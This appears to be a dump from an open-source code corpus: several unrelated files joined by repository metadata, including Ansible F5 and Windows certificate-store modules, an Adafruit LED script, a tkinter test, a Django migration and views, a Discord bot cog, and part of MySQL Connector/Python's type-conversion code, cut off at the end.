pool: "my-pool" partition: "Common" host: "{{ ansible_default_ipv4["address"] }}" port: 80 delegate_to: localhost ''' def pool_exists(api, pool): # hack to determine if pool exists result = False try: api.LocalLB.Pool.get_object_status(pool_names=[pool]) result = True except bigsuds.OperationFailed as e: if "was not found" in str(e): result = False else: # genuine exception raise return result def member_exists(api, pool, address, port): # hack to determine if member exists result = False try: members = [{'address': address, 'port': port}] api.LocalLB.Pool.get_member_object_status(pool_names=[pool], members=[members]) result = True except bigsuds.OperationFailed as e: if "was not found" in str(e): result = False else: # genuine exception raise return result def delete_node_address(api, address): result = False try: api.LocalLB.NodeAddressV2.delete_node_address(nodes=[address]) result = True except bigsuds.OperationFailed as e: if "is referenced by a member of pool" in str(e): result = False else: # genuine exception raise return result def remove_pool_member(api, pool, address, port): members = [{'address': address, 'port': port}] api.LocalLB.Pool.remove_member_v2( pool_names=[pool], members=[members] ) def add_pool_member(api, pool, address, port): members = [{'address': address, 'port': port}] api.LocalLB.Pool.add_member_v2( pool_names=[pool], members=[members] ) def get_connection_limit(api, pool, address, port): members = [{'address': address, 'port': port}] result = api.LocalLB.Pool.get_member_connection_limit( pool_names=[pool], members=[members] )[0][0] return result def set_connection_limit(api, pool, address, port, limit): members = [{'address': address, 'port': port}] api.LocalLB.Pool.set_member_connection_limit( pool_names=[pool], members=[members], limits=[[limit]] ) def get_description(api, pool, address, port): members = [{'address': address, 'port': port}] result = api.LocalLB.Pool.get_member_description( pool_names=[pool], members=[members] )[0][0] return result def set_description(api, pool, address, port, description): members = [{'address': address, 'port': port}] api.LocalLB.Pool.set_member_description( pool_names=[pool], members=[members], descriptions=[[description]] ) def get_rate_limit(api, pool, address, port): members = [{'address': address, 'port': port}] result = api.LocalLB.Pool.get_member_rate_limit( pool_names=[pool], members=[members] )[0][0] return result def set_rate_limit(api, pool, address, port, limit): members = [{'address': address, 'port': port}] api.LocalLB.Pool.set_member_rate_limit( pool_names=[pool], members=[members], limits=[[limit]] ) def get_ratio(api, pool, address, port): members = [{'address': address, 'port': port}] result = api.LocalLB.Pool.get_member_ratio( pool_names=[pool], members=[members] )[0][0] return result def set_ratio(api, pool, address, port, ratio): members = [{'address': address, 'port': port}] api.LocalLB.Pool.set_member_ratio( pool_names=[pool], members=[members], ratios=[[ratio]] ) def set_member_session_enabled_state(api, pool, address, port, session_state): members = [{'address': address, 'port': port}] session_state = ["STATE_%s" % session_state.strip().upper()] api.LocalLB.Pool.set_member_session_enabled_state( pool_names=[pool], members=[members], session_states=[session_state] ) def get_member_session_status(api, pool, address, port): members = [{'address': address, 'port': port}] result = api.LocalLB.Pool.get_member_session_status( pool_names=[pool], members=[members] )[0][0] result = result.split("SESSION_STATUS_")[-1].lower() return result def set_member_monitor_state(api, pool, address, port, monitor_state): members = [{'address': address, 'port': port}] monitor_state = ["STATE_%s" % monitor_state.strip().upper()] api.LocalLB.Pool.set_member_monitor_state( pool_names=[pool], members=[members], monitor_states=[monitor_state] ) def get_member_monitor_status(api, pool, address, port): members = [{'address': address, 'port': port}] result = api.LocalLB.Pool.get_member_monitor_status( pool_names=[pool], members=[members] )[0][0] result = result.split("MONITOR_STATUS_")[-1].lower() return result def main(): argument_spec = f5_argument_spec() meta_args = dict( session_state=dict(type='str', choices=['enabled', 'disabled']), monitor_state=dict(type='str', choices=['enabled', 'disabled']), pool=dict(type='str', required=True), host=dict(type='str', required=True, aliases=['address', 'name']), port=dict(type='int', required=True), connection_limit=dict(type='int'), description=dict(type='str'), rate_limit=dict(type='int'), ratio=dict(type='int'), preserve_node=dict(type='bool', default=False) ) argument_spec.update(meta_args) module = AnsibleModule( argument_spec=argument_spec, supports_check_mode=True ) if module.params['validate_certs']: import ssl if not hasattr(ssl, 'SSLContext'): module.fail_json(msg='bigsuds does not support verifying certificates with python < 2.7.9. Either update python or set validate_certs=False on the task') server = module.params['server'] server_port = module.params['server_port'] user = module.params['user'] password = module.params['password'] state = module.params['state'] partition = module.params['partition'] validate_certs = module.params['validate_certs'] session_state = module.params['session_state'] monitor_state = module.params['monitor_state'] pool = fq_name(partition, module.params['pool']) connection_limit = module.params['connection_limit'] description = module.params['description'] rate_limit = module.params['rate_limit'] ratio = module.params['ratio'] host = module.params['host'] address = fq_name(partition, host) port = module.params['port'] preserve_node = module.params['preserve_node'] if (host and port is None) or (port is not None and not host): module.fail_json(msg="both host and port must be supplied") if 0 > port or port > 65535: module.fail_json(msg="valid ports must be in range 0 - 65535") try: api = bigip_api(server, user, password, validate_certs, port=server_port) if not pool_exists(api, pool): module.fail_json(msg="pool %s does not exist" % pool) result = {'changed': False} # default if state == 'absent': if member_exists(api, pool, address, port): if not module.check_mode: remove_pool_member(api, pool, address, port) if preserve_node: result = {'changed': True} else: deleted = delete_node_address(api, address) result = {'changed': True, 'deleted': deleted} else: result = {'changed': True} elif state == 'present': if not member_exists(api, pool, address, port): if not module.check_mode: add_pool_member(api, pool, address, port) if connection_limit is not None: set_connection_limit(api, pool, address, port, connection_limit) if description is not None: set_description(api, pool, address, port, description) if rate_limit is not None: set_rate_limit(api, pool, address, port, rate_limit) if ratio is not None: set_ratio(api, pool, address, port, ratio) if session_state is not None: set_member_session_enabled_state(api, pool, address, port, session_state) if monitor_state is not None: set_member_monitor_state(api, pool, address, port, monitor_state) result = {'changed': True} else: # pool member exists -- potentially modify attributes if connection_limit is not None and connection_limit != get_connection_limit(api, pool, address, port): if not module.check_mode: set_connection_limit(api, pool, address, port, connection_limit) result = {'changed': True} if description is not None and description != get_description(api, pool, address, port): if not module.check_mode: set_description(api, pool, address, port, description) result = {'changed': True} if rate_limit is not None and rate_limit != get_rate_limit(api, pool, address, port): if not module.check_mode: set_rate_limit(api, pool, address, port, rate_limit) result = {'changed': True} if ratio is not None and ratio != get_ratio(api, pool, address, port): if not module.check_mode: set_ratio(api, pool, address, port, ratio) result = {'changed': True} if session_state is not None: session_status = get_member_session_status(api, pool, address, port) if session_state == 'enabled' and session_status == 'forced_disabled': if not module.check_mode: set_member_session_enabled_state(api, pool, address, port, session_state) result = {'changed': True} elif session_state == 'disabled' and session_status != 'forced_disabled': if not module.check_mode: set_member_session_enabled_state(api, pool, address, port, session_state) result = {'changed': True} if monitor_state is not None: monitor_status = get_member_monitor_status(api, pool, address, port) if monitor_state == 'enabled' and monitor_status == 'forced_down': if not module.check_mode: set_member_monitor_state(api, pool, address, port, monitor_state) result = {'changed': True} elif monitor_state == 'disabled' and monitor_status != 'forced_down': if not module.check_mode: set_member_monitor_state(api, pool, address, port, monitor_state) result = {'changed': True} except Exception as e: module.fail_json(msg="received exception: %s" % e) module.exit_json(**result) from ansible.module_utils.basic import * from ansible.module_utils.f5 import * if __name__ == '__main__': main()
gpl-3.0
lmprice/ansible
lib/ansible/modules/windows/win_certificate_store.py
16
6975
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright: (c) 2017, Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = r''' --- module: win_certificate_store version_added: '2.5' short_description: Manages the certificate store description: - Used to import/export and remove certificates and keys from the local certificate store. - This module is not used to create certificates and will only manage existing certs as a file or in the store. - It can be used to import PEM, DER, P7B, PKCS12 (PFX) certificates and export PEM, DER and PKCS12 certificates. options: state: description: - If C(present), will ensure that the certificate at I(path) is imported into the certificate store specified. - If C(absent), will ensure that the certificate specified by I(thumbprint) or the thumbprint of the cert at I(path) is removed from the store specified. - If C(exported), will ensure the file at I(path) is a certificate specified by I(thumbprint). - When exporting a certificate, if I(path) is a directory then the module will fail, otherwise the file will be replaced if needed. choices: [ absent, exported, present ] default: present path: description: - The path to a certificate file. - This is required when I(state) is C(present) or C(exported). - When I(state) is C(absent) and I(thumbprint) is not specified, the thumbprint is derived from the certificate at this path. thumbprint: description: - The thumbprint as a hex string to either export or remove. - See the examples for how to specify the thumbprint. store_name: description: - The store name to use when importing a certificate or searching for a certificate. - "C(AddressBook): The X.509 certificate store for other users" - "C(AuthRoot): The X.509 certificate store for third-party certificate authorities (CAs)" - "C(CertificateAuthority): The X.509 certificate store for intermediate certificate authorities (CAs)" - "C(Disallowed): The X.509 certificate store for revoked certificates" - "C(My): The X.509 certificate store for personal certificates" - "C(Root): The X.509 certificate store for trusted root certificate authorities (CAs)" - "C(TrustedPeople): The X.509 certificate store for directly trusted people and resources" - "C(TrustedPublisher): The X.509 certificate store for directly trusted publishers" default: My choices: - AddressBook - AuthRoot - CertificateAuthority - Disallowed - My - Root - TrustedPeople - TrustedPublisher store_location: description: - The store location to use when importing a certificate or searching for a certificate. choices: [ CurrentUser, LocalMachine ] default: LocalMachine password: description: - The password of the pkcs12 certificate key. - This is used when reading a pkcs12 certificate file or the password to set when C(state=exported) and C(file_type=pkcs12). - If the pkcs12 file has no password set or no password should be set on the exported file, do not set this option. key_exportable: description: - Whether to allow the private key to be exported. - If C(no), then this module and other process will only be able to export the certificate and the private key cannot be exported. - Used when C(state=present) only. type: bool default: 'yes' key_storage: description: - Specifies where Windows will store the private key when it is imported. - When set to C(default), the default option as set by Windows is used. - When set to C(machine), the key is stored in a path accessible by various users. - When set to C(user), the key is stored in a path only accessible by the current user. - Used when C(state=present) only and cannot be changed once imported. - See U(https://msdn.microsoft.com/en-us/library/system.security.cryptography.x509certificates.x509keystorageflags.aspx) for more details. choices: [ default, machine, user ] default: default file_type: description: - The file type to export the certificate as when C(state=exported). - C(der) is a binary ASN.1 encoded file. - C(pem) is a base64 encoded file of a der file in the OpenSSL form. - C(pkcs12) (also known as pfx) is a binary container that contains both the certificate and private key unlike the other options. - When C(pkcs12) is set and the private key is not exportable or accessible by the current user, it will throw an exception. choices: [ der, pem, pkcs12 ] default: der notes: - Some actions on PKCS12 certificates and keys may fail with the error C(the specified network password is not correct), either use CredSSP or Kerberos with credential delegation, or use C(become) to bypass these restrictions. - The certificates must be located on the Windows host to be set with I(path). author: - Jordan Borean (@jborean93) ''' EXAMPLES = r''' - name: import a certificate win_certificate_store: path: C:\Temp\cert.pem state: present - name: import pfx certificate that is password protected win_certificate_store: path: C:\Temp\cert.pfx state: present password: VeryStrongPasswordHere! become: yes become_method: runas - name: import pfx certificate without password and set private key as un-exportable win_certificate_store: path: C:\Temp\cert.pfx state: present key_exportable: no # usually you don't set this here but it is for illustrative purposes vars: ansible_winrm_transport: credssp - name: remove a certificate based on file thumbprint win_certificate_store: path: C:\Temp\cert.pem state: absent - name: remove a certificate based on thumbprint win_certificate_store: thumbprint: BD7AF104CF1872BDB518D95C9534EA941665FD27 state: absent - name: remove certificate based on thumbprint is CurrentUser/TrustedPublishers store win_certificate_store: thumbprint: BD7AF104CF1872BDB518D95C9534EA941665FD27 state: absent store_location: CurrentUser store_name: TrustedPublisher - name: export certificate as der encoded file win_certificate_store: path: C:\Temp\cert.cer state: exported file_type: der - name: export certificate and key as pfx encoded file win_certificate_store: path: C:\Temp\cert.pfx state: exported file_type: pkcs12 password: AnotherStrongPass! become: yes become_method: runas become_user: SYSTEM ''' RETURN = r''' thumbprints: description: A list of certificate thumbprints that were touched by the module. returned: success type: list sample: ["BC05633694E675449136679A658281F17A191087"] '''
gpl-3.0
gchinellato/Self-Balance-Robot
examples/Adafruit-Raspberry-Pi-Python-Code/Adafruit_LEDpixels/Adafruit_LEDpixels.py
5
2078
#!/usr/bin/env python # Test code for Adafruit LED Pixels, uses hardware SPI import RPi.GPIO as GPIO, time, os DEBUG = 1 GPIO.setmode(GPIO.BCM) def slowspiwrite(clockpin, datapin, byteout): GPIO.setup(clockpin, GPIO.OUT) GPIO.setup(datapin, GPIO.OUT) for i in range(8): if (byteout & 0x80): GPIO.output(datapin, True) else: GPIO.output(clockpin, False) byteout <<= 1 GPIO.output(clockpin, True) GPIO.output(clockpin, False) SPICLK = 18 SPIDO = 17 ledpixels = [0] * 25 def writestrip(pixels): spidev = file("/dev/spidev0.0", "w") for i in range(len(pixels)): spidev.write(chr((pixels[i]>>16) & 0xFF)) spidev.write(chr((pixels[i]>>8) & 0xFF)) spidev.write(chr(pixels[i] & 0xFF)) spidev.close() time.sleep(0.002) def Color(r, g, b): return ((r & 0xFF) << 16) | ((g & 0xFF) << 8) | (b & 0xFF) def setpixelcolor(pixels, n, r, g, b): if (n >= len(pixels)): return pixels[n] = Color(r,g,b) def setpixelcolor(pixels, n, c): if (n >= len(pixels)): return pixels[n] = c def colorwipe(pixels, c, delay): for i in range(len(pixels)): setpixelcolor(pixels, i, c) writestrip(pixels) time.sleep(delay) def Wheel(WheelPos): if (WheelPos < 85): return Color(WheelPos * 3, 255 - WheelPos * 3, 0) elif (WheelPos < 170): WheelPos -= 85; return Color(255 - WheelPos * 3, 0, WheelPos * 3) else: WheelPos -= 170; return Color(0, WheelPos * 3, 255 - WheelPos * 3) def rainbowCycle(pixels, wait): for j in range(256): # one cycle of all 256 colors in the wheel for i in range(len(pixels)): # tricky math! we use each pixel as a fraction of the full 96-color wheel # (thats the i / strip.numPixels() part) # Then add in j which makes the colors go around per pixel # the % 96 is to make the wheel cycle around setpixelcolor(pixels, i, Wheel( ((i * 256 / len(pixels)) + j) % 256) ) writestrip(pixels) time.sleep(wait) colorwipe(ledpixels, Color(255, 0, 0), 0.05) colorwipe(ledpixels, Color(0, 255, 0), 0.05) colorwipe(ledpixels, Color(0, 0, 255), 0.05) while True: rainbowCycle(ledpixels, 0.00)
gpl-3.0
foodszhang/kbengine
kbe/res/scripts/common/Lib/tkinter/test/test_ttk/test_style.py
94
2900
import unittest import tkinter from tkinter import ttk from test.support import requires, run_unittest from tkinter.test.support import AbstractTkTest requires('gui') class StyleTest(AbstractTkTest, unittest.TestCase): def setUp(self): super().setUp() self.style = ttk.Style(self.root) def test_configure(self): style = self.style style.configure('TButton', background='yellow') self.assertEqual(style.configure('TButton', 'background'), 'yellow') self.assertIsInstance(style.configure('TButton'), dict) def test_map(self): style = self.style style.map('TButton', background=[('active', 'background', 'blue')]) self.assertEqual(style.map('TButton', 'background'), [('active', 'background', 'blue')] if self.wantobjects else [('active background', 'blue')]) self.assertIsInstance(style.map('TButton'), dict) def test_lookup(self): style = self.style style.configure('TButton', background='yellow') style.map('TButton', background=[('active', 'background', 'blue')]) self.assertEqual(style.lookup('TButton', 'background'), 'yellow') self.assertEqual(style.lookup('TButton', 'background', ['active', 'background']), 'blue') self.assertEqual(style.lookup('TButton', 'optionnotdefined', default='iknewit'), 'iknewit') def test_layout(self): style = self.style self.assertRaises(tkinter.TclError, style.layout, 'NotALayout') tv_style = style.layout('Treeview') # "erase" Treeview layout style.layout('Treeview', '') self.assertEqual(style.layout('Treeview'), [('null', {'sticky': 'nswe'})] ) # restore layout style.layout('Treeview', tv_style) self.assertEqual(style.layout('Treeview'), tv_style) # should return a list self.assertIsInstance(style.layout('TButton'), list) # correct layout, but "option" doesn't exist as option self.assertRaises(tkinter.TclError, style.layout, 'Treeview', [('name', {'option': 'inexistent'})]) def test_theme_use(self): self.assertRaises(tkinter.TclError, self.style.theme_use, 'nonexistingname') curr_theme = self.style.theme_use() new_theme = None for theme in self.style.theme_names(): if theme != curr_theme: new_theme = theme self.style.theme_use(theme) break else: # just one theme available, can't go on with tests return self.assertFalse(curr_theme == new_theme) self.assertFalse(new_theme != self.style.theme_use()) self.style.theme_use(curr_theme) tests_gui = (StyleTest, ) if __name__ == "__main__": run_unittest(*tests_gui)
lgpl-3.0
adlius/osf.io
osf/migrations/0150_fix_deleted_preprints.py
11
1216
# -*- coding: utf-8 -*- # Generated by Django 1.11.15 on 2018-12-14 19:31 from __future__ import unicode_literals import datetime as dt from django.db import connection from django.db import migrations import pytz dummy_datetime = dt.datetime(1970, 1, 1, tzinfo=pytz.UTC) def forward(state, *args, **kwargs): Preprint = state.get_model('osf', 'Preprint') with connection.cursor() as cursor: cursor.execute(""" SELECT applied FROM django_migrations WHERE name = '0136_preprint_node_divorce' AND app = 'osf' """) npd_release_date = cursor.fetchone()[0] preprints = ( Preprint.objects .filter(created__lt=npd_release_date) .filter(node__is_deleted=True, deleted__isnull=True) ) preprints.update(deleted=dummy_datetime) def backward(state, *args, **kwargs): Preprint = state.get_model('osf', 'Preprint') preprints = ( Preprint.objects .filter(deleted=dummy_datetime) ) preprints.update(deleted=None) class Migration(migrations.Migration): dependencies = [ ('osf', '0149_add_datacite_doi_switch'), ] operations = [ migrations.RunPython(forward, backward) ]
apache-2.0
dhenrygithub/QGIS
python/ext-libs/future/past/types/oldstr.py
62
4300
""" Pure-Python implementation of a Python 2-like str object for Python 3. """ from collections import Iterable from numbers import Integral from past.utils import PY2, with_metaclass _builtin_bytes = bytes class BaseOldStr(type): def __instancecheck__(cls, instance): return isinstance(instance, _builtin_bytes) def unescape(s): """ Interprets strings with escape sequences Example: >>> s = unescape(r'abc\\def') # i.e. 'abc\\\\def' >>> print(s) 'abc\def' >>> s2 = unescape('abc\\ndef') >>> len(s2) 8 >>> print(s2) abc def """ return s.encode().decode('unicode_escape') class oldstr(with_metaclass(BaseOldStr, _builtin_bytes)): """ A forward port of the Python 2 8-bit string object to Py3 """ # Python 2 strings have no __iter__ method: @property def __iter__(self): raise AttributeError def __dir__(self): return [thing for thing in dir(_builtin_bytes) if thing != '__iter__'] # def __new__(cls, *args, **kwargs): # """ # From the Py3 bytes docstring: # bytes(iterable_of_ints) -> bytes # bytes(string, encoding[, errors]) -> bytes # bytes(bytes_or_buffer) -> immutable copy of bytes_or_buffer # bytes(int) -> bytes object of size given by the parameter initialized with null bytes # bytes() -> empty bytes object # # Construct an immutable array of bytes from: # - an iterable yielding integers in range(256) # - a text string encoded using the specified encoding # - any object implementing the buffer API. # - an integer # """ # # if len(args) == 0: # return super(newbytes, cls).__new__(cls) # # Was: elif isinstance(args[0], newbytes): # # We use type() instead of the above because we're redefining # # this to be True for all unicode string subclasses. Warning: # # This may render newstr un-subclassable. # elif type(args[0]) == newbytes: # return args[0] # elif isinstance(args[0], _builtin_bytes): # value = args[0] # elif isinstance(args[0], unicode): # if 'encoding' not in kwargs: # raise TypeError('unicode string argument without an encoding') # ### # # Was: value = args[0].encode(**kwargs) # # Python 2.6 string encode() method doesn't take kwargs: # # Use this instead: # newargs = [kwargs['encoding']] # if 'errors' in kwargs: # newargs.append(kwargs['errors']) # value = args[0].encode(*newargs) # ### # elif isinstance(args[0], Iterable): # if len(args[0]) == 0: # # What is this? # raise ValueError('unknown argument type') # elif len(args[0]) > 0 and isinstance(args[0][0], Integral): # # It's a list of integers # value = b''.join([chr(x) for x in args[0]]) # else: # raise ValueError('item cannot be interpreted as an integer') # elif isinstance(args[0], Integral): # if args[0] < 0: # raise ValueError('negative count') # value = b'\x00' * args[0] # else: # value = args[0] # return super(newbytes, cls).__new__(cls, value) def __repr__(self): s = super(oldstr, self).__repr__() # e.g. b'abc' on Py3, b'abc' on Py3 return s[1:] def __str__(self): s = super(oldstr, self).__str__() # e.g. "b'abc'" or "b'abc\\ndef' # TODO: fix this: assert s[:2] == "b'" and s[-1] == "'" return unescape(s[2:-1]) # e.g. 'abc' or 'abc\ndef' def __getitem__(self, y): if isinstance(y, Integral): return super(oldstr, self).__getitem__(slice(y, y+1)) else: return super(oldstr, self).__getitem__(y) def __getslice__(self, *args): return self.__getitem__(slice(*args)) def __contains__(self, key): if isinstance(key, int): return False def __native__(self): return bytes(self) __all__ = ['oldstr']
gpl-2.0
hemebond/kapua
courses/views.py
1
4832
# Copyright 2011 James O'Neill # # This file is part of Kapua. # # Kapua is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Kapua is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Kapua. If not, see <http://www.gnu.org/licenses/>. from django.contrib.auth.decorators import login_required from django.utils.decorators import method_decorator from django.views.generic import ListView, DetailView, UpdateView, \ FormView, CreateView from django.views.generic.detail import SingleObjectMixin from django.http import HttpResponseRedirect from django.shortcuts import redirect from .models import Course, Page from .forms import CourseForm, PageForm class CourseList(ListView): model = Course class CourseAdd(CreateView): template_name = "courses/course_edit.html" form_class = CourseForm context_object_name = "course" @method_decorator(login_required) def dispatch(self, *args, **kwargs): return super(CourseAdd, self).dispatch(*args, **kwargs) class CourseDetail(DetailView): template_name = "courses/course_detail.html" model = Course context_object_name = "course" def get(self, request, *args, **kwargs): self.object = self.get_object() if self.object.pages.exists(): return redirect('kapua-page-detail', self.object.pages.get(level=0).pk) context = self.get_context_data(object=self.object) return self.render_to_response(context) class CourseEdit(UpdateView): template_name = "courses/course_edit.html" form_class = CourseForm model = Course class PageAdd(SingleObjectMixin, FormView): model = Course template_name = "courses/page_edit.html" form_class = PageForm @method_decorator(login_required) def dispatch(self, *args, **kwargs): return super(PageAdd, self).dispatch(*args, **kwargs) def get_form(self, form_class): self.object = self.get_object() return super(PageAdd, self).get_form(form_class) def get_form_kwargs(self): """ Returns the keyword arguments for instantiating the form. """ form_kwargs = super(PageAdd, self).get_form_kwargs() form_kwargs.update({ 'valid_targets': self.object.pages.filter(level__gt=0) }) return form_kwargs def form_valid(self, form): position = form.cleaned_data.get('position', 'last-child') target = form.cleaned_data.get('target', None) course = self.object page = form.save(commit=False) page.course = course if not target: if course.pages.exists(): target = course.pages.get(level=0) position = 'last-child' if target: page.insert_at( target=target, position=position, save=True, ) self.success_url = page.get_absolute_url() else: page.save() self.success_url = course.get_absolute_url() return super(PageAdd, self).form_valid(form) def get_context_data(self, *args, **kwargs): context = super(PageAdd, self).get_context_data(*args, **kwargs) if context['form'].errors: context['error_message'] = context['form'].errors return context class PageDetail(DetailView): template_name = "courses/page_detail.html" context_object_name = "page" model = Page def get_context_data(self, **kwargs): # Call the base implementation first to get a context context = super(PageDetail, self).get_context_data(**kwargs) context['course'] = self.object.course pages = context['course'].pages.all() for index, page in enumerate(pages): if page.pk == self.object.pk: if index > 0: context['previous_page'] = pages[index - 1] if index < (len(pages) - 1): context['next_page'] = pages[index + 1] break # Remove the root page context['pages'] = pages.filter(level__gt=0) # This gets the ancestors of the current page but exluces the # root page context['breadcrumbs'] = pages.filter( lft__lt=self.object.lft, rght__gt=self.object.rght ).exclude( level=0 ) return context class PageEdit(UpdateView): template_name = "courses/page_edit.html" form_class = PageForm model = Page @method_decorator(login_required) def dispatch(self, *args, **kwargs): return super(PageEdit, self).dispatch(*args, **kwargs) def form_valid(self, form): self.object = form.save() target = form.cleaned_data.get('target') if target: position = form.cleaned_data.get('position') self.object.move_to( target=target, position=position ) return redirect('kapua-page-detail', self.object.pk)
gpl-3.0
Pikl/PiklBot
cogs/pikl.py
1
1281
import discord from discord.ext import commands class Pikl: """Super pikly commands.""" def __init__(self, bot): self.bot = bot @commands.command(hidden=False) async def helloworld(self): """Hello, world!""" await self.bot.say("Hello, world!") @commands.command(hidden=False) async def postraidembed(self): """Posts an embedded message with a bunch of raid info""" embed = discord.Embed(colour=discord.Colour(0x2ecc40), description="Some helpful information to aid and review [Dawn] raids.\n") embed.set_image(url="https://cdn.discordapp.com/attachments/350137990959464459/354412417381433354/unknown.png") embed.set_thumbnail(url="https://wiki.guildwars2.com/images/5/5e/Legendary_Insight.png") embed.set_author(name="Dawn Raid Information", icon_url="http://raid.pikly.uk/images/dawn-logo.png") embed.set_footer(text=": 'Stack on Pikl'", icon_url="http://raid.pikly.uk/images/dawn-logo.png") embed.add_field(name="Raid Logs & Videos", value="https://raid.pikly.uk/", inline=True) embed.add_field(name="Raid Class Spreadsheet", value="[Spreadsheet here](https://docs.google.com/spreadsheets/d/1zm46Jb8UBIoYP1_mewoOvLKopx_Sks9hYGm8OeWaQI8/edit?usp=sharing)", inline=True) await self.bot.say(embed=embed) def setup(bot): bot.add_cog(Pikl(bot))
gpl-3.0
CharlesMcKinnis/stack-recon
stack-recon/mysql/connector/conversion.py
15
19710
# MySQL Connector/Python - MySQL driver written in Python. # Copyright (c) 2009, 2015, Oracle and/or its affiliates. All rights reserved. # MySQL Connector/Python is licensed under the terms of the GPLv2 # <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>, like most # MySQL Connectors. There are special exceptions to the terms and # conditions of the GPLv2 as it is applied to this software, see the # FOSS License Exception # <http://www.mysql.com/about/legal/licensing/foss-exception.html>. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """Converting MySQL and Python types """ import datetime import time from decimal import Decimal from .constants import FieldType, FieldFlag, CharacterSet from .catch23 import PY2, NUMERIC_TYPES, struct_unpack from .custom_types import HexLiteral class MySQLConverterBase(object): """Base class for conversion classes All class dealing with converting to and from MySQL data types must be a subclass of this class. """ def __init__(self, charset='utf8', use_unicode=True): self.python_types = None self.mysql_types = None self.charset = None self.charset_id = 0 self.use_unicode = None self.set_charset(charset) self.set_unicode(use_unicode) self._cache_field_types = {} def set_charset(self, charset): """Set character set""" if charset == 'utf8mb4': charset = 'utf8' if charset is not None: self.charset = charset else: # default to utf8 self.charset = 'utf8' self.charset_id = CharacterSet.get_charset_info(self.charset)[0] def set_unicode(self, value=True): """Set whether to use Unicode""" self.use_unicode = value def to_mysql(self, value): """Convert Python data type to MySQL""" type_name = value.__class__.__name__.lower() try: return getattr(self, "_{0}_to_mysql".format(type_name))(value) except AttributeError: return value def to_python(self, vtype, value): """Convert MySQL data type to Python""" if (value == b'\x00' or value is None) and vtype[1] != FieldType.BIT: # Don't go further when we hit a NULL value return None if not self._cache_field_types: self._cache_field_types = {} for name, info in FieldType.desc.items(): try: self._cache_field_types[info[0]] = getattr( self, '_{0}_to_python'.format(name)) except AttributeError: # We ignore field types which has no method pass try: return self._cache_field_types[vtype[1]](value, vtype) except KeyError: return value def escape(self, buf): """Escape buffer for sending to MySQL""" return buf def quote(self, buf): """Quote buffer for sending to MySQL""" return str(buf) class MySQLConverter(MySQLConverterBase): """Default conversion class for MySQL Connector/Python. o escape method: for escaping values send to MySQL o quoting method: for quoting values send to MySQL in statements o conversion mapping: maps Python and MySQL data types to function for converting them. Whenever one needs to convert values differently, a converter_class argument can be given while instantiating a new connection like cnx.connect(converter_class=CustomMySQLConverterClass). """ def __init__(self, charset=None, use_unicode=True): MySQLConverterBase.__init__(self, charset, use_unicode) self._cache_field_types = {} def escape(self, value): """ Escapes special characters as they are expected to by when MySQL receives them. As found in MySQL source mysys/charset.c Returns the value if not a string, or the escaped string. """ if value is None: return value elif isinstance(value, NUMERIC_TYPES): return value if isinstance(value, (bytes, bytearray)): value = value.replace(b'\\', b'\\\\') value = value.replace(b'\n', b'\\n') value = value.replace(b'\r', b'\\r') value = value.replace(b'\047', b'\134\047') # single quotes value = value.replace(b'\042', b'\134\042') # double quotes value = value.replace(b'\032', b'\134\032') # for Win32 else: value = value.replace('\\', '\\\\') value = value.replace('\n', '\\n') value = value.replace('\r', '\\r') value = value.replace('\047', '\134\047') # single quotes value = value.replace('\042', '\134\042') # double quotes value = value.replace('\032', '\134\032') # for Win32 return value def quote(self, buf): """ Quote the parameters for commands. General rules: o numbers are returns as bytes using ascii codec o None is returned as bytearray(b'NULL') o Everything else is single quoted '<buf>' Returns a bytearray object. """ if isinstance(buf, NUMERIC_TYPES): if PY2: if isinstance(buf, float): return repr(buf) else: return str(buf) else: return str(buf).encode('ascii') elif isinstance(buf, type(None)): return bytearray(b"NULL") else: return bytearray(b"'" + buf + b"'") def to_mysql(self, value): """Convert Python data type to MySQL""" type_name = value.__class__.__name__.lower() try: return getattr(self, "_{0}_to_mysql".format(type_name))(value) except AttributeError: raise TypeError("Python '{0}' cannot be converted to a " "MySQL type".format(type_name)) def to_python(self, vtype, value): """Convert MySQL data type to Python""" if value == 0 and vtype[1] != FieldType.BIT: # \x00 # Don't go further when we hit a NULL value return None if value is None: return None if not self._cache_field_types: self._cache_field_types = {} for name, info in FieldType.desc.items(): try: self._cache_field_types[info[0]] = getattr( self, '_{0}_to_python'.format(name)) except AttributeError: # We ignore field types which has no method pass try: return self._cache_field_types[vtype[1]](value, vtype) except KeyError: # If one type is not defined, we just return the value as str try: return value.decode('utf-8') except UnicodeDecodeError: return value except ValueError as err: raise ValueError("%s (field %s)" % (err, vtype[0])) except TypeError as err: raise TypeError("%s (field %s)" % (err, vtype[0])) except: raise def _int_to_mysql(self, value): """Convert value to int""" return int(value) def _long_to_mysql(self, value): """Convert value to int""" return int(value) def _float_to_mysql(self, value): """Convert value to float""" return float(value) def _str_to_mysql(self, value): """Convert value to string""" if PY2: return str(value) return self._unicode_to_mysql(value) def _unicode_to_mysql(self, value): """Convert unicode""" charset = self.charset charset_id = self.charset_id if charset == 'binary': charset = 'utf8' charset_id = CharacterSet.get_charset_info(charset)[0] encoded = value.encode(charset) if charset_id in CharacterSet.slash_charsets: if b'\x5c' in encoded: return HexLiteral(value, charset) return encoded def _bytes_to_mysql(self, value): """Convert value to bytes""" return value def _bytearray_to_mysql(self, value): """Convert value to bytes""" return str(value) def _bool_to_mysql(self, value): """Convert value to boolean""" if value: return 1 else: return 0 def _nonetype_to_mysql(self, value): """ This would return what None would be in MySQL, but instead we leave it None and return it right away. The actual conversion from None to NULL happens in the quoting functionality. Return None. """ return None def _datetime_to_mysql(self, value): """ Converts a datetime instance to a string suitable for MySQL. The returned string has format: 